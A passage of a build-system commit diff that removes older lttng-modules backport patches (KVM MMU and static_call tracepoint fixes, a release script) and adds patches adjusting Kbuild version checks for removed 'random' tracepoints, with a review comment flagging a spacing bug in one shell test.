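-+ )
-+)
-+
-+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(3,11,0))
-
- LTTNG_TRACEPOINT_EVENT_MAP(
- mark_mmio_spte,
-diff --git a/probes/lttng-probe-kvm-x86-mmu.c b/probes/lttng-probe-kvm-x86-mmu.c
-index 8f981865..5043c776 100644
---- a/probes/lttng-probe-kvm-x86-mmu.c
-+++ b/probes/lttng-probe-kvm-x86-mmu.c
-@@ -31,6 +31,11 @@
- #include <../../arch/x86/kvm/mmutrace.h>
- #endif
-
-+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
-+#include <../arch/x86/kvm/mmu.h>
-+#include <../arch/x86/kvm/mmu/spte.h>
-+#endif
-+
- #undef TRACE_INCLUDE_PATH
- #undef TRACE_INCLUDE_FILE
-
---
-2.25.1
-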
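--- a/meta/recipes-kernel/lttng/lttng-modules/0008-fix-KVM-x86-mmu-Return-unique-RET_PF_-values-if-the-.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From 14bbccffa579f4d66e2900843d6afae1294ce7c8 Mon Sep 17 00:00:00 2001
-From: Michael Jeanson <mjeanson@efficios.com>
-Date: Mon, 26 Oct 2020 17:07:13 -0400
-Subject: [PATCH 08/16] fix: KVM: x86/mmu: Return unique RET_PF_* values if the
- fault was fixed (v5.10)
-
-See upstream commit :
-
- commit c4371c2a682e0da1ed2cd7e3c5496f055d873554
- Author: Sean Christopherson <sean.j.christopherson@intel.com>
- Date: Wed Sep 23 15:04:24 2020 -0700
-
- KVM: x86/mmu: Return unique RET_PF_* values if the fault was fixed
-
- Introduce RET_PF_FIXED and RET_PF_SPURIOUS to provide unique return
- values instead of overloading RET_PF_RETRY. In the short term, the
- unique values add clarity to the code and RET_PF_SPURIOUS will be used
- by set_spte() to avoid unnecessary work for spurious faults.
-
- In the long term, TDX will use RET_PF_FIXED to deterministically map
- memory during pre-boot. The page fault flow may bail early for benign
- reasons, e.g. if the mmu_notifier fires for an unrelated address. With
- only RET_PF_RETRY, it's impossible for the caller to distinguish between
- "cool, page is mapped" and "darn, need to try again", and thus cannot
- handle benign cases like the mmu_notifier retry.
-
-Upstream-Status: Backport
-
-Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
-Change-Id: Ie0855c78852b45f588e131fe2463e15aae1bc023
----
- .../lttng-module/arch/x86/kvm/mmutrace.h | 22 ++++++++++++++++++-
- 1 file changed, 21 insertions(+), 1 deletion(-)
-
-diff --git a/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h b/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
-index 86717835..cdf0609f 100644
---- a/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
-+++ b/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
-@@ -233,7 +233,27 @@ LTTNG_TRACEPOINT_EVENT_MAP(
- )
- )
-
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,6,0) || \
-+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
-+LTTNG_TRACEPOINT_EVENT_MAP(
-+ fast_page_fault,
-+
-+ kvm_mmu_fast_page_fault,
-+
-+ TP_PROTO(struct kvm_vcpu *vcpu, gpa_t cr2_or_gpa, u32 error_code,
-+ u64 *sptep, u64 old_spte, int ret),
-+ TP_ARGS(vcpu, cr2_or_gpa, error_code, sptep, old_spte, ret),
-+
-+ TP_FIELDS(
-+ ctf_integer(int, vcpu_id, vcpu->vcpu_id)
-+ ctf_integer(gpa_t, cr2_or_gpa, cr2_or_gpa)
-+ ctf_integer(u32, error_code, error_code)
-+ ctf_integer_hex(u64 *, sptep, sptep)
-+ ctf_integer(u64, old_spte, old_spte)
-+ ctf_integer(u64, new_spte, *sptep)
-+ ctf_integer(int, ret, ret)
-+ )
-+)
-+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(5,6,0) || \
- LTTNG_KERNEL_RANGE(4,19,103, 4,20,0) || \
- LTTNG_KERNEL_RANGE(5,4,19, 5,5,0) || \
- LTTNG_KERNEL_RANGE(5,5,3, 5,6,0) || \
---
-2.25.1
-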
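--- a/meta/recipes-kernel/lttng/lttng-modules/0009-fix-tracepoint-Optimize-using-static_call-v5.10.patch
+++ /dev/null
@@ -1,155 +0,0 @@
-From c6b31b349fe901a8f586a66064f9e9b15449ac1c Mon Sep 17 00:00:00 2001
-From: Michael Jeanson <mjeanson@efficios.com>
-Date: Mon, 26 Oct 2020 17:09:05 -0400
-Subject: [PATCH 09/16] fix: tracepoint: Optimize using static_call() (v5.10)
-
-See upstream commit :
-
- commit d25e37d89dd2f41d7acae0429039d2f0ae8b4a07
- Author: Steven Rostedt (VMware) <rostedt@goodmis.org>
- Date: Tue Aug 18 15:57:52 2020 +0200
-
- tracepoint: Optimize using static_call()
-
- Currently the tracepoint site will iterate a vector and issue indirect
- calls to however many handlers are registered (ie. the vector is
- long).
-
- Using static_call() it is possible to optimize this for the common
- case of only having a single handler registered. In this case the
- static_call() can directly call this handler. Otherwise, if the vector
- is longer than 1, call a function that iterates the whole vector like
- the current code.
-
-Upstream-Status: Backport
-
-Change-Id: I739dd84d62cc1a821b8bd8acff74fa29aa25d22f
-Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
----
- lttng-statedump-impl.c | 44 ++++++++++++++++++++++++++++++++-------
- probes/lttng.c | 7 +++++--
- tests/probes/lttng-test.c | 7 ++++++-
- wrapper/tracepoint.h | 8 +++++++
- 4 files changed, 56 insertions(+), 10 deletions(-)
-
-diff --git a/lttng-statedump-impl.c b/lttng-statedump-impl.c
-index 54a309d1..e0b19b42 100644
---- a/lttng-statedump-impl.c
-+++ b/lttng-statedump-impl.c
-@@ -55,13 +55,43 @@
- #define LTTNG_INSTRUMENTATION
- #include <instrumentation/events/lttng-module/lttng-statedump.h>
-
--DEFINE_TRACE(lttng_statedump_block_device);
--DEFINE_TRACE(lttng_statedump_end);
--DEFINE_TRACE(lttng_statedump_interrupt);
--DEFINE_TRACE(lttng_statedump_file_descriptor);
--DEFINE_TRACE(lttng_statedump_start);
--DEFINE_TRACE(lttng_statedump_process_state);
--DEFINE_TRACE(lttng_statedump_network_interface);
-+LTTNG_DEFINE_TRACE(lttng_statedump_block_device,
-+ TP_PROTO(struct lttng_session *session,
-+ dev_t dev, const char *diskname),
-+ TP_ARGS(session, dev, diskname));
-+
-+LTTNG_DEFINE_TRACE(lttng_statedump_end,
-+ TP_PROTO(struct lttng_session *session),
-+ TP_ARGS(session));
-+
-+LTTNG_DEFINE_TRACE(lttng_statedump_interrupt,
-+ TP_PROTO(struct lttng_session *session,
-+ unsigned int irq, const char *chip_name,
-+ struct irqaction *action),
-+ TP_ARGS(session, irq, chip_name, action));
-+
-+LTTNG_DEFINE_TRACE(lttng_statedump_file_descriptor,
-+ TP_PROTO(struct lttng_session *session,
-+ struct files_struct *files,
-+ int fd, const char *filename,
-+ unsigned int flags, fmode_t fmode),
-+ TP_ARGS(session, files, fd, filename, flags, fmode));
-+
-+LTTNG_DEFINE_TRACE(lttng_statedump_start,
-+ TP_PROTO(struct lttng_session *session),
-+ TP_ARGS(session));
-+
-+LTTNG_DEFINE_TRACE(lttng_statedump_process_state,
-+ TP_PROTO(struct lttng_session *session,
-+ struct task_struct *p,
-+ int type, int mode, int submode, int status,
-+ struct files_struct *files),
-+ TP_ARGS(session, p, type, mode, submode, status, files));
-+
-+LTTNG_DEFINE_TRACE(lttng_statedump_network_interface,
-+ TP_PROTO(struct lttng_session *session,
-+ struct net_device *dev, struct in_ifaddr *ifa),
-+ TP_ARGS(session, dev, ifa));
-
- struct lttng_fd_ctx {
- char *page;
-diff --git a/probes/lttng.c b/probes/lttng.c
-index 05bc1388..7ddaa69f 100644
---- a/probes/lttng.c
-+++ b/probes/lttng.c
-@@ -8,7 +8,7 @@
- */
-
- #include <linux/module.h>
--#include <linux/tracepoint.h>
-+#include <wrapper/tracepoint.h>
- #include <linux/uaccess.h>
- #include <linux/gfp.h>
- #include <linux/fs.h>
-@@ -32,7 +32,10 @@
- #define LTTNG_LOGGER_COUNT_MAX 1024
- #define LTTNG_LOGGER_FILE "lttng-logger"
-
--DEFINE_TRACE(lttng_logger);
-+LTTNG_DEFINE_TRACE(lttng_logger,
-+ PARAMS(const char __user *text, size_t len),
-+ PARAMS(text, len)
-+);
-
- static struct proc_dir_entry *lttng_logger_dentry;
-
-diff --git a/tests/probes/lttng-test.c b/tests/probes/lttng-test.c
-index c728bed5..8f2d3feb 100644
---- a/tests/probes/lttng-test.c
-+++ b/tests/probes/lttng-test.c
-@@ -26,7 +26,12 @@
- #define LTTNG_INSTRUMENTATION
- #include <instrumentation/events/lttng-module/lttng-test.h>
-
--DEFINE_TRACE(lttng_test_filter_event);
-+LTTNG_DEFINE_TRACE(lttng_test_filter_event,
-+ PARAMS(int anint, int netint, long *values,
-+ char *text, size_t textlen,
-+ char *etext, uint32_t * net_values),
-+ PARAMS(anint, netint, values, text, textlen, etext, net_values)
-+);
-
- #define LTTNG_TEST_FILTER_EVENT_FILE "lttng-test-filter-event"
-
-diff --git a/wrapper/tracepoint.h b/wrapper/tracepoint.h
-index 3883e11a..758038b6 100644
---- a/wrapper/tracepoint.h
-+++ b/wrapper/tracepoint.h
-@@ -20,6 +20,14 @@
-
- #endif
-
-+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
-+#define LTTNG_DEFINE_TRACE(name, proto, args) \
-+ DEFINE_TRACE(name, PARAMS(proto), PARAMS(args))
-+#else
-+#define LTTNG_DEFINE_TRACE(name, proto, args) \
-+ DEFINE_TRACE(name)
-+#endif
-+
- #ifndef HAVE_KABI_2635_TRACEPOINT
-
- #define kabi_2635_tracepoint_probe_register tracepoint_probe_register
---
-2.25.1
-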
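--- a/meta/recipes-kernel/lttng/lttng-modules/0010-fix-include-order-for-older-kernels.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 2ce89d35c9477d8c17c00489c72e1548e16af9b9 Mon Sep 17 00:00:00 2001
-From: Michael Jeanson <mjeanson@efficios.com>
-Date: Fri, 20 Nov 2020 11:42:30 -0500
-Subject: [PATCH 10/16] fix: include order for older kernels
-
-Fixes a build failure on v3.0 and v3.1.
-
-Upstream-Status: Backport
-
-Change-Id: Ic48512d2aa5ee46678e67d147b92dba6d0959615
-Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
----
- lttng-events.h | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/lttng-events.h b/lttng-events.h
-index 099fd78b..f5cc57c6 100644
---- a/lttng-events.h
-+++ b/lttng-events.h
-@@ -16,6 +16,7 @@
- #include <linux/kref.h>
- #include <lttng-cpuhotplug.h>
- #include <linux/uuid.h>
-+#include <linux/irq_work.h>
- #include <wrapper/uprobes.h>
- #include <lttng-tracer.h>
- #include <lttng-abi.h>
---
-2.25.1
-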
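--- a/meta/recipes-kernel/lttng/lttng-modules/0011-Add-release-maintainer-script.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 22ffa48439e617a32556365e00827fba062c5688 Mon Sep 17 00:00:00 2001
-From: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
-Date: Mon, 23 Nov 2020 10:49:57 -0500
-Subject: [PATCH 11/16] Add release maintainer script
-
-Upstream-Status: Backport
-
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
----
- scripts/maintainer/do-release.sh | 37 ++++++++++++++++++++++++++++++++
- 1 file changed, 37 insertions(+)
- create mode 100755 scripts/maintainer/do-release.sh
-
-diff --git a/scripts/maintainer/do-release.sh b/scripts/maintainer/do-release.sh
-new file mode 100755
-index 00000000..e0cec167
---- /dev/null
-+++ b/scripts/maintainer/do-release.sh
-@@ -0,0 +1,37 @@
-+#!/bin/sh
-+
-+# invoke with do-release 2.N.M, or 2.N.M-rcXX
-+
-+REL=$1
-+SRCDIR=~/git/lttng-modules
-+# The output files are created in ${HOME}/stable/
-+OUTPUTDIR=${HOME}/stable
-+
-+if [ x"$1" = x"" ]; then
-+ echo "1 arg : VERSION";
-+ exit 1;
-+fi
-+
-+cd ${OUTPUTDIR}
-+
-+echo Doing LTTng modules release ${REL}
-+
-+mkdir lttng-modules-${REL}
-+cd lttng-modules-${REL}
-+cp -ax ${SRCDIR}/. .
-+
-+#cleanup
-+make clean
-+git clean -xdf
-+
-+for a in \*.orig \*.rej Module.markers Module.symvers; do
-+ find . -name "${a}" -exec rm '{}' \;;
-+done
-+for a in outgoing .tmp_versions .git .pc; do
-+ find . -name "${a}" -exec rm -rf '{}' \;;
-+done
-+
-+cd ..
-+tar cvfj lttng-modules-${REL}.tar.bz2 lttng-modules-${REL}
-+mksums lttng-modules-${REL}.tar.bz2
-+signpkg lttng-modules-${REL}.tar.bz2
---
-2.25.1
-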
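--- a/meta/recipes-kernel/lttng/lttng-modules/0012-Improve-the-release-script.patch
+++ /dev/null
@@ -1,173 +0,0 @@
-From a241d30fa82ed0be1026f14e36e8bd2b0e65740d Mon Sep 17 00:00:00 2001
-From: Michael Jeanson <mjeanson@efficios.com>
-Date: Mon, 23 Nov 2020 12:15:43 -0500
-Subject: [PATCH 12/16] Improve the release script
-
- * Use git-archive, this removes all custom code to cleanup the repo, it
- can now be used in an unclean repo as the code will be exported from
- a specific tag.
- * Add parameters, this will allow using the script on any machine
- while keeping the default behavior for the maintainer.
-
-Upstream-Status: Backport
-
-Change-Id: I9f29d0e1afdbf475d0bbaeb9946ca3216f725e86
-Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
----
- .gitattributes | 3 +
- scripts/maintainer/do-release.sh | 121 +++++++++++++++++++++++++------
- 2 files changed, 100 insertions(+), 24 deletions(-)
- create mode 100644 .gitattributes
-
-diff --git a/.gitattributes b/.gitattributes
-new file mode 100644
-index 00000000..7839355a
---- /dev/null
-+++ b/.gitattributes
-@@ -0,0 +1,3 @@
-+.gitattributes export-ignore
-+.gitignore export-ignore
-+.gitreview export-ignore
-diff --git a/scripts/maintainer/do-release.sh b/scripts/maintainer/do-release.sh
-index e0cec167..5e94e136 100755
---- a/scripts/maintainer/do-release.sh
-+++ b/scripts/maintainer/do-release.sh
-@@ -1,37 +1,110 @@
--#!/bin/sh
-+#!/bin/bash
-+
-+set -eu
-+set -o pipefail
-
- # invoke with do-release 2.N.M, or 2.N.M-rcXX
-
--REL=$1
--SRCDIR=~/git/lttng-modules
-+# Default maintainer values
-+SRCDIR="${HOME}/git/lttng-modules"
- # The output files are created in ${HOME}/stable/
--OUTPUTDIR=${HOME}/stable
-+OUTPUTDIR="${HOME}/stable"
-+SIGN="yes"
-+VERBOSE=""
-+
-+usage() {
-+ echo "Usage: do-release.sh [OPTION]... RELEASE"
-+ echo
-+ echo "Mandatory arguments to long options are mandatory for short options too."
-+ echo " -s, --srcdir DIR source directory"
-+ echo " -o, --outputdir DIR output directory, must exist"
-+ echo " -n, --no-sign don't GPG sign the output archive"
-+ echo " -v, --verbose verbose command output"
-+}
-+
-+POS_ARGS=()
-+while [[ $# -gt 0 ]]
-+do
-+ arg="$1"
-+
-+ case $arg in
-+ -n|--no-sign)
-+ SIGN="no"
-+ shift 1
-+ ;;
-+
-+ -s|--srcdir)
-+ SRCDIR="$2"
-+ shift 2
-+ ;;
-+
-+ -o|--outputdir)
-+ OUTPUTDIR="$2"
-+ shift 2
-+ ;;
-+
-+ -v|--verbose)
-+ VERBOSE="-v"
-+ shift 1
-+ ;;
-+
-+ # Catch unknown arguments
-+ -*)
-+ usage
-+ exit 1
-+ ;;
-+
-+ *)
-+ POS_ARGS+=("$1")
-+ shift
-+ ;;
-+ esac
-+done
-+set -- "${POS_ARGS[@]}"
-
--if [ x"$1" = x"" ]; then
-- echo "1 arg : VERSION";
-+REL=${1:-}
-+
-+if [ x"${REL}" = x"" ]; then
-+ usage
- exit 1;
- fi
-
--cd ${OUTPUTDIR}
-+echo "Doing LTTng modules release ${REL}"
-+echo " Source dir: ${SRCDIR}"
-+echo " Output dir: ${OUTPUTDIR}"
-+echo " GPG sign: ${SIGN}"
-
--echo Doing LTTng modules release ${REL}
-+# Make sure the output directory exists
-+if [ ! -d "${OUTPUTDIR}" ]; then
-+ echo "Output directory '${OUTPUTDIR}' doesn't exist."
-+ exit 1
-+fi
-
--mkdir lttng-modules-${REL}
--cd lttng-modules-${REL}
--cp -ax ${SRCDIR}/. .
-+# Make sure the source directory is a git repository
-+if [ ! -r "${SRCDIR}/.git/config" ]; then
-+ echo "Source directory '${SRCDIR}' isn't a git repository."
-+ exit 1
-+fi
-
--#cleanup
--make clean
--git clean -xdf
-+# Set the git repo directory for all further git commands
-+export GIT_DIR="${SRCDIR}/.git/"
-
--for a in \*.orig \*.rej Module.markers Module.symvers; do
-- find . -name "${a}" -exec rm '{}' \;;
--done
--for a in outgoing .tmp_versions .git .pc; do
-- find . -name "${a}" -exec rm -rf '{}' \;;
--done
-+# Check if the release tag exists
-+if ! git rev-parse "refs/tags/v${REL}" >/dev/null 2>&1; then
-+ echo "Release tag 'v${REL}' doesn't exist."
-+ exit 1
-+fi
-+
-+# Generate the compressed tar archive, the git attributes from the tag will be used.
-+git archive $VERBOSE --format=tar --prefix="lttng-modules-${REL}/" "v${REL}" | bzip2 > "${OUTPUTDIR}/lttng-modules-${REL}.tar.bz2"
-
--cd ..
--tar cvfj lttng-modules-${REL}.tar.bz2 lttng-modules-${REL}
--mksums lttng-modules-${REL}.tar.bz2
--signpkg lttng-modules-${REL}.tar.bz2
-+pushd "${OUTPUTDIR}" >/dev/null
-+# Generate the hashes
-+md5sum "lttng-modules-${REL}.tar.bz2" > "lttng-modules-${REL}.tar.bz2.md5"
-+sha256sum "lttng-modules-${REL}.tar.bz2" > "lttng-modules-${REL}.tar.bz2.sha256"
-+
-+if [ "x${SIGN}" = "xyes" ]; then
-+ # Sign with the default key
-+ gpg --armor -b "lttng-modules-${REL}.tar.bz2"
-+fi
-+popd >/dev/null
---
-2.25.1
-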
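--- a/meta/recipes-kernel/lttng/lttng-modules/0013-fix-backport-of-fix-ext4-fast-commit-recovery-path-v.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 59fcc704bea8ecf4bd401e744df41e3331359524 Mon Sep 17 00:00:00 2001
-From: Michael Jeanson <mjeanson@efficios.com>
-Date: Mon, 23 Nov 2020 10:19:52 -0500
-Subject: [PATCH 13/16] fix: backport of fix: ext4: fast commit recovery path
- (v5.10)
-
-Add missing '#endif'.
-
-Upstream-Status: Backport
-
-Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
-Change-Id: I43349d685d7ed740b32ce992be0c2e7e6f12c799
----
- instrumentation/events/lttng-module/ext4.h | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/instrumentation/events/lttng-module/ext4.h b/instrumentation/events/lttng-module/ext4.h
-index 5fddccad..d454fa6e 100644
---- a/instrumentation/events/lttng-module/ext4.h
-+++ b/instrumentation/events/lttng-module/ext4.h
-@@ -1446,6 +1446,7 @@ LTTNG_TRACEPOINT_EVENT(ext4_load_inode,
- )
- )
- #endif
-+#endif
-
- #if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0))
-
---
-2.25.1
-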
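--- a/meta/recipes-kernel/lttng/lttng-modules/0014-Revert-fix-include-order-for-older-kernels.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From b2df75dd378ce5260bb51872e43ac1d76fbf4588 Mon Sep 17 00:00:00 2001
-From: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
-Date: Mon, 23 Nov 2020 14:21:51 -0500
-Subject: [PATCH 14/16] Revert "fix: include order for older kernels"
-
-This reverts commit 2ce89d35c9477d8c17c00489c72e1548e16af9b9.
-
-This commit is only needed for master and stable-2.12, because
-stable-2.11 does not include irq_work.h.
-
-Upstream-Status: Backport
-
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
----
- lttng-events.h | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/lttng-events.h b/lttng-events.h
-index f5cc57c6..099fd78b 100644
---- a/lttng-events.h
-+++ b/lttng-events.h
-@@ -16,7 +16,6 @@
- #include <linux/kref.h>
- #include <lttng-cpuhotplug.h>
- #include <linux/uuid.h>
--#include <linux/irq_work.h>
- #include <wrapper/uprobes.h>
- #include <lttng-tracer.h>
- #include <lttng-abi.h>
---
-2.25.1
-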
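--- a/meta/recipes-kernel/lttng/lttng-modules/0015-fix-backport-of-fix-tracepoint-Optimize-using-static.patch
+++ /dev/null
@@ -1,46 +0,0 @@
-From f8922333020aaa267e17fb23180b56c4c16ebe9e Mon Sep 17 00:00:00 2001
-From: Michael Jeanson <mjeanson@efficios.com>
-Date: Tue, 24 Nov 2020 11:11:42 -0500
-Subject: [PATCH 15/16] fix: backport of fix: tracepoint: Optimize using
- static_call() (v5.10)
-
-Upstream-Status: Backport
-
-Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
-Change-Id: I94f2b845f11654e639f03254185980de527a4ca8
----
- lttng-statedump-impl.c | 9 ++++-----
- 1 file changed, 4 insertions(+), 5 deletions(-)
-
-diff --git a/lttng-statedump-impl.c b/lttng-statedump-impl.c
-index e0b19b42..a8c32db5 100644
---- a/lttng-statedump-impl.c
-+++ b/lttng-statedump-impl.c
-@@ -72,10 +72,9 @@ LTTNG_DEFINE_TRACE(lttng_statedump_interrupt,
-
- LTTNG_DEFINE_TRACE(lttng_statedump_file_descriptor,
- TP_PROTO(struct lttng_session *session,
-- struct files_struct *files,
-- int fd, const char *filename,
-+ struct task_struct *p, int fd, const char *filename,
- unsigned int flags, fmode_t fmode),
-- TP_ARGS(session, files, fd, filename, flags, fmode));
-+ TP_ARGS(session, p, fd, filename, flags, fmode));
-
- LTTNG_DEFINE_TRACE(lttng_statedump_start,
- TP_PROTO(struct lttng_session *session),
-@@ -85,8 +84,8 @@ LTTNG_DEFINE_TRACE(lttng_statedump_process_state,
- TP_PROTO(struct lttng_session *session,
- struct task_struct *p,
- int type, int mode, int submode, int status,
-- struct files_struct *files),
-- TP_ARGS(session, p, type, mode, submode, status, files));
-+ struct pid_namespace *pid_ns),
-+ TP_ARGS(session, p, type, mode, submode, status, pid_ns));
-
- LTTNG_DEFINE_TRACE(lttng_statedump_network_interface,
- TP_PROTO(struct lttng_session *session,
---
-2.25.1
-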
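--- a/meta/recipes-kernel/lttng/lttng-modules/0016-fix-adjust-version-range-for-trace_find_free_extent.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 5c3e67d7994097cc75f45258b7518aacb55dde1b Mon Sep 17 00:00:00 2001
-From: Michael Jeanson <mjeanson@efficios.com>
-Date: Tue, 24 Nov 2020 11:27:18 -0500
-Subject: [PATCH 16/16] fix: adjust version range for trace_find_free_extent()
-
-Upstream-Status: Backport
-
-Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
-Change-Id: Iaa6088092cf58b4d29d55f3ff9586c57ae272302
----
- instrumentation/events/lttng-module/btrfs.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/instrumentation/events/lttng-module/btrfs.h b/instrumentation/events/lttng-module/btrfs.h
-index d47f3280..efe7af96 100644
---- a/instrumentation/events/lttng-module/btrfs.h
-+++ b/instrumentation/events/lttng-module/btrfs.h
-@@ -1917,7 +1917,7 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserved_extent, btrfs_reserved_extent_f
- #endif /* #else #if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,10,0)) */
-
- #if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0) || \
-- LTTNG_KERNEL_RANGE(5,9,6, 5,10,0) || \
-+ LTTNG_KERNEL_RANGE(5,9,5, 5,10,0) || \
- LTTNG_KERNEL_RANGE(5,4,78, 5,5,0))
- LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
-
---
-2.25.1
-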
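--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch
@@ -0,0 +1,46 @@
+From 25b70c486bb96de0caf7cea1da42ed07801cca84 Mon Sep 17 00:00:00 2001
+From: Michael Jeanson <mjeanson@efficios.com>
+Date: Mon, 4 Apr 2022 14:33:42 -0400
+Subject: [PATCH 17/19] fix: random: remove unused tracepoints (v5.18)
+
+See upstream commit :
+
+ commit 14c174633f349cb41ea90c2c0aaddac157012f74
+ Author: Jason A. Donenfeld <Jason@zx2c4.com>
+ Date: Thu Feb 10 16:40:44 2022 +0100
+
+ random: remove unused tracepoints
+
+ These explicit tracepoints aren't really used and show sign of aging.
+ It's work to keep these up to date, and before I attempted to keep them
+ up to date, they weren't up to date, which indicates that they're not
+ really used. These days there are better ways of introspecting anyway.
+
+Upstream-Status: Backport [369d82bb1746447514c877088d7c5fd0f39140f8]
+Change-Id: I3b8c3e2732e7efdd76ce63204ac53a48784d0df6
+Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+---
+ probes/Kbuild | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 3ae2d39e..58da82b8 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -215,8 +215,11 @@ ifneq ($(CONFIG_FRAME_WARN),0)
+ CFLAGS_lttng-probe-printk.o += -Wframe-larger-than=2200
+ endif
+
++# Introduced in v3.6, remove in v5.18
+ obj-$(CONFIG_LTTNG) += $(shell \
+- if [ $(VERSION) -ge 4 \
++ if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
++ -a \
++ $(VERSION) -ge 4 \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 5 -a $(SUBLEVEL) -ge 2 \) \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -eq 4 -a $(SUBLEVEL) -ge 9 \) \
+--
+2.35.1
+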
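--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch
@@ -0,0 +1,45 @@
+From da956d1444139883f5d01078d945078738ffade4 Mon Sep 17 00:00:00 2001
+From: He Zhe <zhe.he@windriver.com>
+Date: Thu, 2 Jun 2022 06:36:08 +0000
+Subject: [PATCH 18/19] fix: random: remove unused tracepoints (v5.10, v5.15)
+
+The following kernel commit has been back ported to v5.10.119 and v5.15.44.
+
+commit 14c174633f349cb41ea90c2c0aaddac157012f74
+Author: Jason A. Donenfeld <Jason@zx2c4.com>
+Date: Thu Feb 10 16:40:44 2022 +0100
+
+ random: remove unused tracepoints
+
+ These explicit tracepoints aren't really used and show sign of aging.
+ It's work to keep these up to date, and before I attempted to keep them
+ up to date, they weren't up to date, which indicates that they're not
+ really used. These days there are better ways of introspecting anyway.
+
+Upstream-Status: Backport [1901e0eb58795e850e8fdcb5e1c235e4397b470d]
+Signed-off-by: He Zhe <zhe.he@windriver.com>
+Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
+Change-Id: I0b7eb8aa78b5bd2039e20ae3e1da4c5eb9018789
+---
+ probes/Kbuild | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/probes/Kbuild b/probes/Kbuild
+index 58da82b8..87f2d681 100644
+--- a/probes/Kbuild
++++ b/probes/Kbuild
+@@ -217,7 +217,10 @@ endif
+
+ # Introduced in v3.6, remove in v5.18
+ obj-$(CONFIG_LTTNG) += $(shell \
+- if [ \( ! \( $(VERSION) -ge 6 -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \) \) \
++ if [ \( ! \( $(VERSION) -ge 6 \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -ge 18 \) \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 15 -a $(SUBLEVEL) -ge 44 \) \
++ -o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119\) \) \) \
+ -a \
+ $(VERSION) -ge 4 \
+ -o \( $(VERSION) -eq 3 -a $(PATCHLEVEL) -ge 6 \) \
+--
+2.35.1
+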
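Review bot: On the 5.10 line added by this patch, `-ge 119\)` has no space before the escaped parenthesis, so the shell passes `119)` to `[` as one word instead of a number followed by a closing parenthesis, and the version test cannot evaluate as written; the line should read `-o \( $(VERSION) -eq 5 -a $(PATCHLEVEL) -eq 10 -a $(SUBLEVEL) -ge 119 \) \) \) \`. Patch 0019 in this same commit deletes the whole expression, so the final Kbuild is not affected, but a tree that carries 0018 without 0019 would presumably stop building lttng-probe-random.o on every kernel. The `$(shell ...)` block starts and ends outside the inner hunk.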
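--- /dev/null
+++ b/meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch
@@ -0,0 +1,51 @@
+From 2c98e0cd03eba0aa935796bc7413c51b5e4b055c Mon Sep 17 00:00:00 2001
+From: Michael Jeanson <mjeanson@efficios.com>
+Date: Tue, 31 May 2022 15:24:48 -0400
+Subject: [PATCH 19/19] fix: 'random' tracepoints removed in stable kernels
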